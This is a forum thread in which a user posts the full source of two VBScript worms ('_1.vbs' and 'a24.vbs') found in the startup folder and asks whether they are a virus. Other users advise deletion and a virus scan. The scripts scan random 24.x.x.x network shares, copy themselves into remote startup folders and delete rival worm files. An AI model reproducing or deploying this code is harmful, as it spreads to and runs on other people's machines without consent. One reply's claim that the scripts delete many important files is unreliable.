Found these 2 files on my hard drive. Is this some kind of virus?

[cheetoden]

I was prompted at boot up to specify what program to open these 2 files up with and I think they are some kind of virus. Here are the contents of the files

1. "_1.vbs"

set t=wscript.createobject("wscript.network&quot
set f=createobject("scripting.filesystemobject&quot
on error resume next
randomize
do
do while w=0
if (f.fileexists("c:\network.vbs&quot) then f.deletefile("c:\network.vbs&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\network.vbs&quot) then f.deletefile("c:\windows\startm~1\programs\startup\network.vbs&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\network.exe&quot) then f.deletefile("c:\windows\startm~1\programs\startup\network.exe&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.exe&quot) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.exe&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\mscfg.vbs&quot) then f.deletefile("c:\windows\startm~1\programs\startup\mscfg.vbs&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\a.vbs&quot) then f.deletefile("c:\windows\startm~1\programs\startup\a.vbs&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\a24.vbs&quot) then f.deletefile("c:\windows\startm~1\programs\startup\a24.vbs&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\little.vbs&quot) then f.deletefile("c:\windows\startm~1\programs\startup\little.vbs&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\prince.vbs&quot) then f.deletefile("c:\windows\startm~1\programs\startup\prince.vbs&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\MS StartUp Config.exe&quot) then f.deletefile("c:\windows\startm~1\programs\startup\MS StartUp Config.exe&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\_a.vbs&quot) then f.deletefile("c:\windows\startm~1\programs\startup\_a.vbs&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\_b.vbs&quot) then f.deletefile("c:\windows\startm~1\programs\startup\_b.vbs&quot

n="\\24."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C"
t.mapnetworkdrive "x:",n
set o=t.enumnetworkdrives
for i=0 to o.Count-1
if n=o.item(i) then w=1
next
loop
f.copyfile "c:\windows\startm~1\programs\startup\_1.vbs", "x:\windows\startm~1\programs\startup\"
t.removenetworkdrive "x:"
w=0
loop
'netlog.worm.remover.optimized.universal.cable_users
'I hate virus wars, but it has to be done.


2. "a24.vbs"

set t=wscript.createobject("wscript.network&quot
set f=createobject("scripting.filesystemobject&quot
on error resume next
randomize
if (f.fileexists("c:\network.vbs&quot) then f.deletefile("c:\network.vbs&quot
if (f.fileexists("c:\windows\startm~1\programs\startup\network.vbs&quot) then f.deletefile("c:\windows\startm~1\programs\startup\network.vbs&quot
do
do while w=0
n="\\24."&int(254*rnd+1)&"."&int(254*rnd+1)&"."&int(254*rnd+1)&"\C"
t.mapnetworkdrive "x:",n
set o=t.enumnetworkdrives
for i=0 to o.Count-1
if n=o.item(i) then w=1
next
loop
f.copyfile "c:\windows\startm~1\programs\startup\a24.vbs", "x:\windows\startm~1\programs\startup\"
t.removenetworkdrive "x:"
w=0
loop
'netlog.worm.remover.optimized
'That's how the normal code should look like...
'Greetings to BSRF.


I normally hide my butt behind my SMC Barricade, but I hung my a$$ out to play some Deer Hunter 4 online for a couple of days
Can any one shed some light on this for me? Thanks.

 

[edblor]

Well,

From reading the file, it's clear it IS a visual basic script virus!! Don't execute it if you have not already! It would delete many many important files instantly!

I would just delete them immediately! It opens up using Visual Basic and/or it's associated runtime library! You may not have it installed which may be why it has not been run yet!!

Get rid of them and virus scan ASAP bud!!

Looking closer, I see it will copy itself to any network drives u r connected to and continue on there!!

Edblor

 

[cheetoden]

I don't think they have executed yet and I moved them to the recycle bin. My other computer that I have networked to this one hasn't been on for a couple of days either.

 

[airfoil]

Dont move thme to the recycle bin, delete them permanently, if you think they are virii.

 

[BadThad]

Virus!

Try to determine the source. Thats just as important as killing them! Good Luck

 

[LumMoose]

Ouch.

 

[MCS]

Dont just delete it, run a Virus checker too if you have one installed.

If not - why not?

 

[amthmi]

Read this..
http://www.symantec.com/avcenter/venc/data/vbs.a24.html